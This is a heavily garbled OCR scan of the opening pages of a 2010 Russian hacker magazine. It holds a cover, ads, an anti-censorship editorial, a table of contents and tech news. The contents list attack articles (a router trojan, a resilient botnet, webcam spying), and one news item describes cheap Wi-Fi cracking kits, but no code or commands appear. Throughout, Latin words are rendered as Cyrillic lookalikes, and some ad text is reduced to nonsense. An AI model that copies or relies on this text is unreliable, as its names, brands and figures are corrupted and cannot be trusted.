07 (ИЮЛЬ) 2010 ТРОЯН В РОУТЕРЕ 



ПОДГЛЯДЫВАЕМ ЧЕРЕЗ ЖЕВ-КАМЕРУ „ 



ГІП 

і 



со 

00 







ВСЕ О ФАЗЗИНІ 
И ФАЗЗЕРАХ 

ОБЗОР БЕСПЛАТНЫХ 
АНТИВИРУСОВ 

АТАКА НА І_ОШ ООМІНО 

ИСТОРИЯ ЗКУРЕ 



НЕГАСИМЫЙ 

БОТНЕТ 

КОДИНГ НЕУБИВАЕМЫХ И 
АБУЗОУСТОЙЧИВЫХ БОТОВ 

СТР. 107 



ѵѵѵѵѵѵ.хакер.ги 



АМА20Ы 53 



ОБЛАЧНЫЕ ТЕХНОЛОГИИ ДЛЯ 
ХРАНЕНИЯ ФАЙЛОВ И БЭКАПА 



СТР. 26 





БЫСТРЫЙ ВЗЛОМ ГОЛОДА! 




50% сотріеіесі 




Загружено: 100 % вкуса, 100 % пользы 



Открытъ еще один глазированный сырок "Зебра" 
после завершения загрузки 




Я сьгг :) 



у ери :) 



Взломай голод, пока он не взломал тебя! 

Ты ещё думаешь, как? 

Просто - с помощью глазированного сырка «Зебра»! 



Ищи на прилавках города! 






СЕЫ50ВЕ0 








Запретител ьно-регул ирующая чума шагает по 
мировому интернету. Великий Китайский файрвол, 
цензура в поиске Ѳоодіе, придурочные инициативы по 
регистрации е-таіі и сайтов в Беларуси, новый закон 
«О СМИ» в нашей стране, который тоже не принесет 
обычным людям и бизнесу ничего хорошего. 

Интернет создавался как всемирная сеть, свободная от 
цензуры, государственной регуляции и ограничений, 
и именно это позволило ему получитьтакое развитие, 
которое он получил. Сейчасже правительства 
некоторых стран видят в этом определенную угрозу для 
механизмов собственной пропаганды: ведь доступность 
информации и способов создавать эту информацию 
серьезно подрывает способность государства 
контролировать СМИ и общественное мнение. 



е-таіі и выдаче техпаспортов на номера I СО — не 
более чем неэффективная выдумка маловменяемых 
чиновников. 

Ведь любое ограничение можно элементарно 
обойти просто в силу структуры и базовых принципов 
интернета. К примеру, «Великий файрвол» 
элементарно огибается при помощи ѴРІ\І, а 
обязательную регистрацию сайтов можно легко сделать 
необязательной, просто купив домен и хостинг в стране 
со «свободным» интернетом. Свободному интернету это 
принесет деньги, а зарегулированному- лучи кровавого 
поноса. 

В ОБЩЕМ, ЗАСВ0Б0ДНЫЙ ИНТЕРНЕТ!:) 



С одной стороны, все происходящее - отличный сюжет 

для антиутопии, а сдругой, пока в интернете нет границ пікііо22,гл.ред.х 

и таможенников, все эти меры по регистрации сайтов, исіаіііе.ііѵеіоигпаі.сот 
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004 Все новое за последний месяц 

ГЕШМ . 

016 Все для 32 нанометров 

Тестирование системных платна базе нового чипсета Іпіеі 

020 Маленький трудяга 

Тестирование монохромного лазерного 
принтера За ппзипд МІ_-1660 

РС_2(М . 

022 Рігейх-убийца 

Собираем хакерскую сборку плагинов для Могіііа 

026 Атаіоп 53 для обычных смертных 

Современныетехнологии облачных вычислений 
для хранения файлов и бэкапа 
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Ищем уязвимости в программах, сетевых сервисах, драйверах 
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Надежные способы сохранить конфиденциальность переписки 

взлом. 
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Хакерские секреты простых вещей 

046 Обзор эксплоитов 

Анализ свеженькихуязвимостей 

052 Вшиваем троян в роутер 

Заражение О-Ііпк 500Т вдомашнихусловиях 

058 Тотальная Доминация 

Ломаем БоШз Оотіпо 

064 Не перезаписью единой... 

Фаззингсайта, «защищенного» тосІ_геѵѵгі1:е 

068 РгосРЗ на службе ѴѴеЬ-взломщика 

Нестандартное использование РгосРЗ 

07 1 Развратно-ориентированное программирование 

Трюки РОР, приводящие кпобеде 

076 Х-Тооіз 

Программы для взлома 

МАДОАРЕ . 

078 Выбираем халявный антивирус 

Что луч ше : АѴО , АѴІ РА ил и АѴА5Т? 

082 Антивирусное ремесло 

Интервью с йгѴѴеЬ 



СЦЕНА. 

084 История Зкуре 

Создание, развитие и продажа компании 

юниксойд. 

090 Младенец с лицом убийцы 

Изучаем внутреннее устройство ОиЬез 05- нового дистрибутива 
І_іпих, предназначенного для обеспечения высокого 
уровня безопасности 

096 Плацебо для тукса 

Тестированиеантивирусовдля Ыпих 

1 00 Умелые ручки: кодинги шитье 

Учимся работать с не-х86 архитектурами из-под Ыпих 

К0ДИНГ. 

1 04 Уроки ядерной войны 

Новые правила выживания в ядре ѴѴіпсІоѵѵз 

107 Негасимый ботнет 

Простой способ кодинга неубиваемых и абузоустойчивых ботов 

1 1 0 Подглядываем через веб-камеру 

Учимся использовать встроенную веб-камеру в своих целях 

1 1 4 Программерские типсы и триксы 

Правила кодинга на С++для настоящих спецов 

ЗѴИ/АСК . 

1 1 6 Сделай ставку на хищника 

Эффективное администрирование средних 
и крупныхлокальныхсетей с помощью Нуепа8.0 

1 20 Ученье - свети высокая зарплата 
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Как подружить ѴѴіпсІоѵѵз и *піххосты в локальной сети 

129 Полный тюнинг движка 

Делаем из пдіпх непробиваемый ѴѴеЬ-сервер 

юниты 

1 34 РЗУСНО: Практикум по социальной инженерии 

Социальный инженер -всем хакерам пример! 

140 РАО ШЕР 

Большой РАО 

1 43 Диско 

8.5 Гб всякой всячины 

144 ѴѴМ 2 

Удобные ѵѵеЬ-сервисы 



Вшиваем троян в роутер 

Заражение О-Ііпк 500Т вдомашнихусловиях 
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Тотальная Доминация 

Ломаем ЦсФиз Оотіпо 
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Мария «Мірріі_і_» Нефедова мАША.мЕРЕооѵдгабі-с.ріі 




МЕ6АЫЕѴѴЗ 

ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 

ШПИОНЫ ПОНЕВОЛЕ 




Компания Соодіе, которую все, кому не лень и так называют то 
«Скайнетом», то «Большим братом», очень эффектно села в лужу. 
Как известно, по крупным городам всего мира колесят специаль- 
ные автомобили Ооодіе Зітееі Ѵіеѵѵ — они фотографируют улицы с 
целью последующего добавления отснятого материала в Соодіе 
Зігееіз. В Германии недавно выяснили, что «гугломобили» зани- 



маются не только этим. Немецким властям очень не понравилось, 
что Зітееі: Ѵіеѵѵ машины собирали базу данных 551 0 и МАО -ад ре- 
сов всех ѴѴі-Рі -сетей, которые попадали в зону их доступа, так что 
сверху было отдано распоряжение проинспектировать такой авто- 
мобиль поближе. Тут-то и открылось самое интересное: оказалось, 
что «гугломобили» не только собирал и данные о ѴѴі-Рі -точках, но 
и перехватывали весьтрафик, передававшийся в незащищенных 
ѴѴі - Рі -сетях. Сколько обрывков самых разных приватных данных 
таким образом попало в руки Соодіе, сказать невозможно, но явно 
немало. Компания, конечно, тут же поспешил а оправдаться и сооб- 
щить, что эти данные никогда не передавались третьим лицам и не 
использовались самим Соодіе. Старший вице-президент компа- 
нии Алан Эстейс заявил следующее: «Все довольно просто — это 
была ошибка. Якобы шпионский код попал на машины случайно, 
оставшись от одного из старых экспериментальных проектов. 
Дотошные европейцы подняли шумиху — это на них похоже. Но 
надо понимать, что едва ли Соодіе наснифал много ценных данных. 
Во-первых, машина постоянно находится в движении. А во- вто- 
рых, сам снифер постоянно скачет с канала на канал (по заявлению 
гуглов, примернобразв секунду]. Ну и что в таких условиях можно 
насобирать? Соодіе уже удалила «лишние» данные, собранные в 
Германии с участием третьих лиц. С аналогичной просьбой также 
обратилась и Ирландия. 



В ПЕРВОМ КВАРТАЛЕ 2010 ГОДА АШОІО 08 ЗАНЯЛА 28 % РЫНКА США. 
ОБОГНАВ ПО ПОПУЛЯРНОСТИ ІРНОИЕ 08 С ЕГО % 



РАІ.М ПРОДАЛИ 

Слухи идомыслы на этутему циркулировали давно, и вот, свершилось — легендарная компания 
Раіт, совсем недавно восставшая из пепла, была куплена компанией НРза $1 ,2 млрд., то есть 
по цене $5,70 за одну акцию. С одной стороны, новость, конечно, грустная, но с другой — вести из 
стана НР пока приходятхорошие, и для Раіт эта сделка — отнюдь не худший вариант. Специа- 
листы НР нетолько хорошо подкованы в вопросах создания КПК, но и собираются продолжать 
активную работу над главным нынешним козырем и активом Раіт — новой платформой ѵѵеЬОЗ. 
Уже сейчас сетевая общественность и многие эксперты всерьез полагают, что будущий «убийца 
іРаб», планшет НРЗІаІе, возможно, будет базироваться вовсе не на ѴѴіпсІоѵѵз 7, 
как планировалось ранее, а именно на новой ѵѵеЬОЗ. В то же время, уже доподлинно известно, 
что нетбуков с ѵѵеЬОЗ на борту можно не ждать: в НР не собираются тратить время на адаптацию 
«смартфон ной» ОС под шустрые и довольно мощные современные нетбуки, так как это попросту 
нерационально. Радостное для НР событие омрачает единственный факт— переход в Соодіе 
Матиаса Дуарте (Маііаз Оиагіе), который в Раіт был вице-президентом и занимался пользо- 
вательскими интерфейсами, втом числе и ѵѵеЬОЗ. Теперь все его силы будут направлены на 
улучшение ІЛ-платформы АпбгоісІ. 
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РЕКЛАМА 



ЭКСКЛЮЗИВНЫЙ ТИРАЖ 
МЕТАЛЛИЧЕСКАЯ УПАКОВКА 




ВСЕ О САМЕІ. НА 
\ѴШ\АЛСАМ Е І.-С АМ Е. ІШ 



5ІІМСЕ 1913 



МЕ6АЫЕѴѴ5 



НАШИ НА ІМА6ШЕ С11Р 2010 

С 3 по 8 июля в Варшаве пройдет ежегодный студенческий ІТ-челлендж МісгозоК 
Ітадіпе Сир. Честь представлять нашу страну на этом соревновании досталась двум 
командам: ЮУрГУ (в категории 5о11\л/аге сіезідп) и МГПУ (ЕтЬесІсІесІ беѵеіортепі:]. 
Напомним, ребята из Южноуральского университета показали на российском фина- 
ле систему контроля качества воды на основе изменения поляризации отраженного 
света, а парни из Педагогического университета везут в Польшу робота-няню, кото- 
рого рассчитывают использовать в детских садах для привлечения внимания детей 
и обучения в игровой форме. Получить дополнительную информацию о конкурсе, 
правилах и ходе соревнования можно на официальном сайте — ѵѵѵѵѵѵ.і та ді 
сот , либо на ѵѵѵѵѵѵ.ппі сгозоіі. сот/гиз/ітадіпесир. Болеем за наших! 




в 2009 ГОДА КОЛИЧЕСТВО ИНТЕРНЕТ-ЮЗЕРОВ В РОССИИ УВЕЛИЧИЛОСЬ ПОЧТИ НА 
ТРЕТЬ И ДОСТИГЛО ',7 МЛН. 



ТЕРАБАЙТ - ХОРОШО. А ТРИ ЛУЧШЕ 



В последнее время емкость винчестеров почти 
прекратила свой постоянный рост, остановив- 
шись на отметке 1-2 Тб, что, конечно же, удру- 
чало многих. И вот, из стана компании 5еада1:е 
наконец-то пришла хорошая новость по этому 
поводу: совсем скоро, уже к концу те куще го года 
американцы планируют порадовать нас новым 
винчестером объемом 3 Тб. Подробности пока 
неизвестны, но заявлено, что новинка будет 
оснащена целым рядом новыхтехнологических 



решений, и у некоторых пользователей с ней, 
похоже, могут возникнуть проблемы. Дело втом, 
что большинство современных ОС при работе с 
винчестерами поддерживаюттолько стандарт 
ИВА, который винтов емкостью более 2,1 Тб не 
понимает. В этой связи новинка будет построена 
на новом стандарте І_опд ИВА, который, в свою 
очередь, уже понимают не все ОС — 64-битные 
ѴѴіп 7 и Ѵізіа с новинкой справятся, а вотѴѴіпсіоѵѵз 
ХР все равно будетвидетьдисккак2,1 Тб. 



ЭПИЧЕСКИЕ БОИ ВИДЕОКОДЕКОВ 



Противостояние не на жизнь, а на смерть 
между кодеками ТЬеога и Н.264 длится уже 
давно, и мало кто не слышал об этом хотя 
бы краем уха. Однако теперь в эту схватку 
вступила третья сторона, которая вполне 
может оставить не у дел обоих противников. В 
противостояние вмешалась компания Ооодіе, 
представив на конференции Ооодіе 1/0 свой 
открытый видеоформат ѴѴеЬМ, состоящий из 
видеокодека ѴР8, аудиокодека ѴогЬіз и кон- 



тейнера Маігозка. После того, как Ооодіе при- 
обрел компанию Оп2 — ребят, разработавших 
ѴРЗ и ѴР8 (этот ход ожидали], новинке прогно- 
зируют быстрое и успешное развитие. Дело в 
том, что ѴѴеЬМ легко интегрируется во все сов- 
ременные платформы, быстр, удобен для сети, 
способен адаптироваться под любую ширину 
канала и отлично показывает себя при работе с 
онлайновыми трансляциями. Поддержка ѴѴеЬМ 
уже есть в девелоперских билдах СЬготіит, 




Обойти эту проблему собираются программным 
путем — вместе с винчестером будет постав- 
ляться специальное ПО для разбивки харда на 
разделы. 



Орега, Еігеіох (ссылки на закачку ищи на 
офсайте проекта — ѵѵѵѵѵѵ.ѵѵеЬтргоіесЬогд ]. 
а протестировать его можно на ѴоиТиЬе, вклю- 
чив в настройках трансляцию через НТМІ_5 и 
добавив в 1)ПІ_ еще один ключ «&ѵѵеЬт=1». 
Прибавь ко всем плюсам максимальный 
битрейт 16384x16384, удобную и многофунк- 
циональную «Матрешку» и целый ряд других 
плюсов, то становится ясно, откуда берутся 
столь оптимистичные прогнозы. 



ЧИТАЛКИ ОБРАСТАЮТ ФУНКЦИОНАЛОМ 




Рынокэлектронных книг все растет, и произ- 
водители этихустройств начинают изощряться 
в попытках перещеголять другдруга. Если 
еще па ру лет назад сенсорный экран и ѴѴі-Рі 
в ридере были дикостью, то сегодня это уже 
норма, и взгляды разработчиков все больше 
устремляются в сторону ПО. Амазоновские 
читалки КіпсІІе, пожалуй, одни из самых «на- 
фаршированных» и продаваемых электронных 
книжек на данный момент, а прямую конкурен- 
цию им составляет Вагпез & ІМоЫе со своим 
ІМоок. Последний недавно объявил отом, что 
их читалка теперь может похвастаться прило- 
жениями ОС АпбгоісІ — играми, функцией Реаб 



Іп 5іоге и бета-версией браузера. Атагоп не 
остался в долгу и анонсировал новую прошивку 
для КіпсІІе, которая даст юзерам возмож- 
ность публиковать понравившиеся цитаты в 
РасеЬоок и ТѵѵіМег, масштабировать и панора- 
мировать информацию в файлах формата РОЕ 
и ряд других приятных мелочей. Складывается 
впечатление, что «Амазону» становится трудно 
конкурировать с ІМоок. Напомним, что ебук 
от Вагпез & ІМоЫе работает под управлением 
АпбгоісІ, что для ридеров в новинку, и оснащен 
сразу двумя дисплеями: основным монохром- 
ным Е-іпк и небольшим цветным сенсорным 
экранчиком. 



► 006 
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ѴѴіпсІоѵѵз®. Жизнь без преград. А51І8 рекомендует ОС ѴѴіпсІоѵѵз 7. 




Ноутбуки А5ІІ5 серии 
Чистый звцк. Яркий цист. 



Современная мультимедийная платформа с интерфейсом ІІЗВ 3.0 

• Подлинная ОС ѴѴіпсІоѵѵз® 7 Домашняя расширенная 

• Новый процессор 2010 года ІпіеІ® Соге™ І7 

• Превосходный звук с технологией ЗопісМазіег 

• Идеальное воспроизведение видео с технологией Ѵісіео Мадіс 

Ноутбук АЗІІЗ Ы61ф оснащенный процессором ІпіеІ® Соге™ І7 и подлинной операционной системой 
ѴѴіпсІоѵѵз® 7 Домашняя расширенная, открывает двери в мир компьютерных развлечений. 
Он идеально подходит для современных мультимедийных приложений. Так, его высокоскоростной 
интерфейс ІІЗВ 3.0 позволяет передавать файлы в 10 раз быстрее, чем ІІЗВ 2.0. Просмотр 
телевизионных передач и видео в форматах НО, прослушивание МРЗ - все это доступно 
с ноутбуком АЗЫЗ N613. Мультимедийные качества моделей серии N впечатлят любого 
пользователя. Реализованные в них технологии ЗопісМазіег и Ѵісіео Мадіс обеспечивают 
поразительное качество звука и четкое, яркое изображение. С новым ноутбуком АЗІІЗ серии N мир 
компьютерных развлечений предстанет перед вами в совершенно новом свете и звуке. 

ѵѵѵѵѵѵ.азиз.ги Всемирная гарантия 2 года Горячая линия АЗІІЗ: (495) 23-11-999 



Информацию о том, где купить ноутбуки АЗІІ5 в Москве и Санкт-Петербурге, можно найти на сайте ѵѵѵѵѵѵ.азизпЬ.ги 

Архангельск: Формоза (8182) 65-79-95; Брянск: Артбук (4832) 687-444; Владивосток: В-Лазер (4232) 218-000; ДНО (4232) 300-454; Владимир: Компьютер-Имидж (4922) 33-19-66; 
Вологда: СИСТЕМА (8172) 529-400; Воронеж: РЕТ (4732) 77-93-39; Екатеринбург: Санрайз (343) 268-88-81; Буква (343) 22-22-025; Трилайн (343) 378-70-70; Клосс (343) 216-17-01; 
Норд 8-800-2000-787; Ижевск: Корпорация «Центр» (3412) 91-88-11; Казань: Ноутбукофф (843) 264-39-32; Киров: Технополис (8332) 480-888; Краснодар: Владос (861) 210-10-01; 
ЗИП (861) 210-00-66; Липецк: Регард-тур (4742) 220-555; Нижний Новгород: Алтэкс (831) 411-87-87; Новосибирск: ГОТТИ (383) 362-00-44; Левел (383) 212-00-05; НОТА (383) 
304-10-10; Техносити (383) 22-33-770; Норильск: ІМесб (3919) 46-73-36; Омск: РИТМ (3812) 20-05-08; Он-Лайн (3812) 200-490; Пермь: Ноутбукофф (342) 270-01-11; Ноутовъ (342) 
210-10-84; Псков: Все для ПК (8112) 72-72-75; Ростов-на-Дону: Иманго (863) 240-40-32; ЗОЬѴѴІИ (863) 261-87-65; КМ Союз (863) 295-50-10; Самара: Прагма (846) 270-17-01; 
Саратов: АТТО (8452) 444-111; Компьюмаркет (8452) 22-36-36; Сургут: Компьютерный супермаркет «ПЕРВЫЙ» (3462) 247-000; Сыктывкар: Эльф (8212) 29-10-83; Томск: Интант 
(3822) 56-00-56; Тюмень: Арсенал+ (3452) 797-070; Ульяновск: Симбирск-М+ (8422) 420-003; Уфа: Кламас (347) 291-21-12; ФортеВД (347) 260-00-00; Чебоксары: Квартон (8352) 
62-55-51; Якутск: Респект (4112) 44-55-44 

ІпіеІ, логотип ІпіеІ, ІпіеІ Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными знаками корпорации ІпіеІ на территории США и других стран. 



N 




Быстрее. 

Умнее. 



Товар сертифицирован, на правах рекламы. 






МЕ6АЫЕѴѴ5 



МОНИТОР С ПОДДЕРЖКОЙ СТЕРЕО 







Компания Ю представила первый в своей линейке монитор ѴѴ23630, 
воспроизводящий контент в формате 30. 23-дюймовая новинка обла- 
дает Биіі ЕЮ разрешением ( 1 920x1 080] , уровнем контрастности 70000:1 
и матрицей со временем отклика 3 мс. 120-герцовая частота разверт- 
ки, необходимая для вывода трехмерного изображения, здесьтоже 
имеется. Также монитор оснащен набором геймерских опцийОМСЮЕ: 
функция ТЬги Мобе поможетуменьшить время отклика за счет отклю- 
чения буферной памяти кадров; технология АВС выведетокно с игрой 
на экрантаким образом, чтобы изображение не искажалось; АіЛоВгідЫ: 
автоматически подстроит яркость экрана для просмотра изображе- 
ния через стереоочки; ЗВЗТги-зиггоипсІ НО обеспечит прекрасный 
объемный звук. Во фронтальную панель монитора встроена кнопка 
управления меню, которую окружаетдинамическая синяя подсветка 
Тги-ЫдЫ:. Тги-ЫдЫ реагируетна наиболее напряженные моменты игры 
— высокую частоту звука или динамические сцены. Монитор работает 
в комплекте с решением ІЧѴЮІАСеРогсеЗО Ѵізіоп, стоимость которого 
составляет примерно 6000 рублей. Рекомендованная цена для самого 
монитора равна 1 7000 деревянных. 



АРР ЗТОПЕ В ТОРРЕНТ-КЛИЕНТЕ 

На очень неожиданный ход решилась компания ВТТоггеЫ, которая нетакдавно 
приобрела известный торрент-клиентрТоггеЫ. Парни из рТоггеЫ вознамерились 
«построить свой Лунапарк», а точнее, завести собственный магазин по образу и 
подобию АррІеАрр Зіюге. Реализована вся эта красота на базе фреймворка для 
рТоггеЫ, который уже существует и носит имя «проект СгіЛіп». 

Аддоны с расширением .Ыарр, написанные на НТМІ_ и ЛаѵаЗсгі рі, можно будетзагру- 
зить прямо через встроенный в клиентбраузер. Своеобразный Арр Зіюге планируют 
добавить в рТоггеЫуже совсем скоро — начиная с версии 2.2 (бета доступна уже 
сейчас]. Будет ли это действительно магазин, в котором появятся платные аддоны, 
или же просто иТоггеЫтакхитро обозвала платформудля распространения плаги- 
нов, станет ясно в самое ближайшее время. Впрочем, стоит только подумать, какова 
аудитория у этого клиента, каксразу понимаешь: да, это реальный способ монетизироваться. Эх, не испортили бы только ребята своедетище, 
превратив миниатюрный и шустрый клиент в громоздкое чудище с кучей ненужного функционала. 

83 % СОСТАВЛЯЕТ ДОЛЯ СПАМА В ПОЧТОВОМ ТРАФИКЕ РУНЕТА 



СВЕРХМОЩНЫЙ БОТНЕТ 

Ботнеты уже в некотором роде стали «нормой жизни» — ежедневно 
десятки миллионов компов по всему миру используются для БоЗ-атак, 
рассылки спама, перебора паролей и кучи других задач. Какправило, 
втакиезомби-сетки объединяются обычные пользовательские ПК, но 
бывают и интересные исключения, одно из которых недавно обнаружили 
спецы компании Ітрегѵа. Все довольно просто: некто Ехетап с помощью 
свежей уязвимости смог сделать массруг веб-серверов, получив на руки 
доступ к более 300 хостам. Для удобного управления на каждый из них 
была залита небольшая ОІЛ-админка (90 строчек кода на РНР). Сам ботнет 
сейчас используется для одной цели — ОБоЗ заданных хостов. Фишка в 
использовании именно серверов заключается втом, что веб-сервер по 
ширине канала намного выгоднее, чем обычный пользовательский комп. 
В результате можно свалить удаленный хост, имея даже относительно 
небольшое количество серверов. 




Арр» іт рТЪгчпІ 
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МЕ6АЫЕѴѴ5 




БАЛМЕР СОЗНАЛСЯ 



Наверняка это известие станет настоящим бальзамом на душу многих 
ІТ-шников. Входе 14-й ежегодной конференции ОБО Зііттіі: Стив Балмер, 
исполнительный директор МісгозоЙ, фактически открыто признал, что М5 
зря потратили время и силы на разработку «Висты». «Мы взвалили на себя 
слишком трудную и масштабную задачу, что в итоге обернулось потерей 
тысяч человеко-часов, потраченных на внедрение инноваций», — сказал 
Стив. Можно домыслить, что Балмер в частности говорил отехнологии 
ОРМ, ради которой компания действительно вывернулась наизнанку, но 
весьэтоттитаническийтруд.в конечном счете так и не оправдался. 



ПРОДАЖИ ІРАБ В США ДОСТИГЛИ 
УРОВНЯ 200 000 ШТУК В НЕДЕЛЮ, 
ОПЕРЕДИВ ПРОДАЖИ КОМПЬЮТЕРОВ 
МАС 



ПЯТИМИНУТКА ПИРАТСКИХ НОВОСТЕЙ 





180 000 ЧЕЛОВЕК РАБОТАЕТ 

НАД ПЛАТФОРМОЙ АШОШ В 
60061-Е 



Давно ничего скандального не было слышно из стана «Пиратской бухты», и такая 
тишина не могла длиться долго. Сервера опального трекера все последнее время 
мирно работали в Нидерландах под крылом хостинг-провайдера СуЬегВипкегв самом 
настоящем бункере 50-х годов. Соль ситуации втом, что СуЬегВипкег провозгласил 
своютерриторию независимым государством еще 7 лет назад. Однако коалиция 
голливудских магнатов в лице СоІитЬіа РісШгез, Оізпеу Епіюгргізез, Рагатоипі; 
РісБигез, Тѵѵеп1:іе1;Ь СепШгу Рох, Ііпіѵегзаіи ѴѴагпегВгоз решила во что бы то ни стало 
достатьтрекер в буквальном смысле из-под земли и закрыть. Борьба «бобра с ослом» 
вышла на очередной витокб мая 2010 года, когда Гамбургский суд вынес провай- 
деру СуЬегВипкегпредписание отключить сервера ТЬе Рігаіе ВауотСети. Один из 
владельцев бункера, известный хакер СВЗРОВ, сначала назвал постановление суда 
незаконным и бредовым, заявив, что СуЬегВипкеги не подумает подчиняться, однако 
спустя время подчиниться пришлось. В результате, ТР В впервые за несколько меся- 
цев провел почти сутки в оффлайне, но затем, какобычно, вернулся с саркастичной 
картинкой на главной. Новый хостинг «Бухты» стал еще большей неожиданностью, 
чем предыдущий — на этотразТРВ приютила «Пиратская партия Швеции»! Парни 
решили, что пришло время «показать зубы» и настоять на своем, а ихточка зрения с 
прошлой осени не поменялась: представители партии в очередной раз подчеркнули, 
чтоТРВ — лишь поисковая машина, деятельность «Бухты» легальна и спроса сТЬе 
Рігаіе Вау не может быть никакого. 



ГУГЛЬ?ШШѴ01)6І.Е! 



В этом месяце у нас какая-то повышенная концентрация новостей 
о разных сумасшедших идеях, и эта новость — не исключение. Не- 
давно компания ПатЫег добавила ксвоим сервисам справочные, 
калькуляционные и конверторные возможности проекта с восхити- 
тельным названием ѴѴЬоѴОНдІе («Хуюгль», если писать кириллицей]. 
Да, и мы, и «Рамблер» в курсе, что первое апреля давно прошло, так 
что это не шутка. Не веришь? Проверь — «Хуюгль» расположился 
по адресу Ыір://ѵѵЬоѵоид[е.ги . и находится он там с 1 -го апреля 2009 
года. ѴѴГіоУО И д Іе — детище известного журналиста и стартапера Ан- 
тона Носика, чья тяга к ненормативной лексике давно ни для кого не 
секрет (в РуНете Носик известен под ником боІЬоеЬ]. За прошедший с 
момента запуска проекта год ѴѴГіоУОНдІе даже успел стать лауреатом 
«Премии Рунета», а теперь благодаря ему рамблеровский поисковик 
умеет выводить прямо в результатах поиска ответы на вопросы вида 




«1 00 юаней в рублях» или «940 килограмм -сила -метров в британских 
тепловых единицах». Воттакой вот маленький «Хуюгль» этим вашим 
«Гуглам». 



► 010 
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Мощный. 

Интеллектуальный. 



Сервер + лицензионный софт! 



ЭКОНОМЬ! 



МОШНЫЙ чСТыОСхЯАерНЫЙ процессор ІПТСГ черп 3400 ДЛЯ многозадачной роботы, 
оперативная память с коррекцией ошибок и дисковое прост рэнство, организованное в влю массив, 
для йсспсробой рдйоти сервера. 

Ли йена ионная серверная операционная система, для комфортной работы и зашиты от многих рисков! 

Тѵхмнчссннв дар акта р нет ик и сер пера] 

* Процессор ЫеШ Яеоп® 3400 

* операционная система ѵѵтгіош* зегѵег 2008* гшпйайоп 

' ОЗУ до 32ГБ ООИЗ ЕСС Ее* 

* Д«с кое^п прлснстемз ло 6 дисков &АТА (опционально -горючей- ад м ены ^ 



Специальные ^славн я для днлерсв н системныя интеграторов! 



Да йейПАаіной нвнЕуАьгацяеД ы по вопросам- пр^ойретанинс^аишАгкьк нашим 
ллдтип-рв-м. Полный описок нартнерон на ѵишѵ.г-»іуі«-еаііірііГ#».ги 
Т« кн ичеісхл к иадл^рчк»: ЗАО -Эр •Стил Нам и ь-юі с-р,“ ■ 

Гса і4Й$і $14-14 %7 &исил%>Інун іѵлщфди длн Ргссии. в-вОО аС’О.^СО-Т 



Корпорация ІпТеІ не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений 
относительно конкретных компьютерных систем, упоминание о которых содержится в данном документе. 

©2009 г, Сеіегоп, Сеіегоп Іпзісіе, СепТгіпо, СепТгіпо Іпзібе, логотип СепТгіпо, Соге Іпзібе, логотип ІпТеІ, ІпТеІ, ІпТеІ Соге, ІпТеІ Іпзібе, логотип ІпТеІ Іпзісіе, ІпТеІ Ѵщ ІпТеІ ѵРго, ІТапіит, 
ІТапіит Іпзісіе, Репііит, РепИит Іп$ібе, Ѵііѵ Іпзісіе, ѵРго Іпзібе, Хеоп, и Хеоп Іпзісіе являются товарными знаками права на которые принадлежат корпорации ІпТеІ на территории 
США и других стран. Все права защищены. Реклама. 








МЕ6АЫЕѴѴ5 



НАЛОГ НА ЧИСТЫЕ НОСИТЕЛИ 



В некоторых европейских странах, в частности 
в Швеции, уже некоторое время существует 
специальный налогна каждый проданный 
трЗ-плеер и чистую болванку. С этого налога 
выплачиваются отчисления вечно обиженным 
правообладателям, которыетаким образом 
пытаются компенсировать свои «чудовищ- 
ные финансовые потери», которые терпят 
из-за пиратства. Теперь «налог на болванки» 



появится и в России — «временный порядок 
контроля за ввозом оборудования и носителей 
для воспроизведения в частных целях»уже 
действует, а скоро подоспеет и постановление 
правительства. Распространяется это новов- 
ведение на всю аудио- и видеоаппаратуру, то 
есть компьютеры, жесткие диски, телефоны, 
деки, плееры, а также на чистые носители 
и такдалее. Отныне импортеры техники не 



только обязаны показать таможне договор 
или гарантийное обязательство, согласно 
которому они обязуются заплатить (вероятнее 
всего, нашему незабвенному РАО] подать в 
размере 0,5% от стоимости товара. Импорте- 
ры, конечно, пока пытаются выразить протест, 
но непохоже, чтобы кто-то собирался к ним 
прислушиваться. Улыбается и машем. 



$20 ЗА КОМПЛЕКТ ДЛЯ ВЗЛОМА ѴѴІ-РІ 



Вследза модным в поднебеснойтрендом организации курсов 
для хакеров предприимчивые китайцы поставили на поток 
продажу готовых комплектов для взлома ѴѴі-Рі сетей. Идея не 



Щ 5РООШІР ІЕГТПЧИ ЙЯ іСИМІ Ріісоип ( іцф, ДТТДСК РАМН НЕЦ’. НШ'П 



Р 



% ІАІМСИ ІШКЕРШ АТТАСК 



^ I I??? ЬЕМЁТН <СК, ДТ ЮОППІѴіГ" 



ѴкПпіЧас ШЬ5В:ШШ 



200 400 000 300 1000 



ш ; 9ііп 




новая, но, вотличиеотболеедорогиханалогов вроде ѴѴіТі Вох 
(ѵѵіб-Ьох.сот), за «подарокскриптикидису» китайцы на рынке 
в Пекине просятвсего 20-30 баксов. Комплект собран в лучших 
традициях«Мабе іп СЫпа»: не самая удачная узконаправленная 
антенна, дешевый И5В-модуль ѴѴі-Рі, который гарантированно 
работает под Ыпих’ом, и диск с записанным Васкіхаск’ом. Дис- 
трибутив ленивого пентестера создатели заботливо включили в 
комплекте вместе с подробной инструкцией, как пробрутфорсить 
ключи для защищенных ѴѴЕР/ѴѴРА сетей. Впрочем, не жди инс- 
трукций по кізтеі и аігсгаск — все делается через 6111-оболочки 
Эроопѵѵер и Эроопѵѵра. Если такой набор покупать через Инет, то 
обойдется он гораздо дороже, но тут надо понимать, что смысла 
в этом никакого нет. Даже если в твоем буке несовместимый с 
Васкігаск беспроводный модуль, можно купить подходящий ѴѴі-Рі 
донгл на известной онлайн-барахолке беаіехіхете.сот. Клю- 
чевое слово для поиска - « РТЕ81 87Ш». Это название чипсета, на 
котором построено огромное количество одинаковых девайсов. 
Их продаютза $20 в разных корпусах и под разными названиями. 
На этом сайте несложно найти и антенну, ноучти: от самой деше- 
вой толка будет не сильно больше, чем от банки пива с нужным 
коннектором. Это я ктому, что антенну можно сделать самому на 
сайтах пад.ги и 1ап23.ш. 




РАРІ05НАРЕѴѴШ5! 



20 МАЯ ПРЕКРАТИЛ СВОЮ РАБОТУ 
НЕКОГДА ПЕРВЫЙ НА ПЛАНЕТЕ 
05ЕШ-СЕРВЕР. ОН БЫЛ ЗАПУЩЕН 
ЕЩЕ В 9 ГОДУ И ПРОРАБОТАЛ 
БОЛЕЕ ІО ЛЕТ 



Копирасты всего мира актив- 
но буйствуют и качают права, и 
